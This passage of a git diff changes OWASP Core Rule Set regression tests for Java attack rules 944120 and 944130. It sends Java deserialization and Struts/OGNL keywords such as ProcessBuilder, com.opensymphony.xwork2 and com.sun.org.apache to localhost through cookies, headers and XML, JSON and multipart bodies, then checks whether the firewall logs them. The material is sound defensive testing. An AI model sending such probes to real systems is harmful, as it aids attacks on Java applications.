ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-108 + desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-109 + desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-110 + desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-111 + desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-112 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-113 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-114 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-115 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-116 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-117 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-118 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-119 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-120 + desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-121 + desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-122 + desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-123 + desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.whileclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-124 + desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-125 + desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-126 + desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-127 + desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-128 + desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-129 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-130 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-131 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: | + {"test": "ProcessBuilder.evil.whileclosure"} + output: + log_contains: "id \"944120\"" + - test_title: 944120-132 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: | + {"ProcessBuilder.evil.whileclosure": "test"} + output: + log_contains: "id \"944120\"" + - test_title: 944120-133 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-134 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-135 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-136 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml index 328162493b..b1f4961d45 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml @@ -1,9697 +1,8063 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944130.yaml" - description: "Positive tests for rule 944130" - tests: - - - test_title: 944130-0 - desc: "Argument test includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-1 - desc: "Argument name includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-2 - desc: "Cookie test includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=com.opensymphony.xwork2 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-3 - desc: "Cookie name includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: com.opensymphony.xwork2=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-4 - desc: "Request header test includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: com.opensymphony.xwork2 - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-5 - desc: "XML attribute value includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-6 - desc: "XML element value includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-7 - desc: "Nested XML element value includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-8 - desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-9 - desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"com.opensymphony.xwork2\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-10 - desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"com.opensymphony.xwork2\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-11 - desc: "Argument test includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-12 - desc: "Argument name includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "com.sun.org.apache=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-13 - desc: "Cookie test includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=com.sun.org.apache - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-14 - desc: "Cookie name includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: com.sun.org.apache=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-15 - desc: "Request header test includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: com.sun.org.apache - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-16 - desc: "XML attribute value includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: 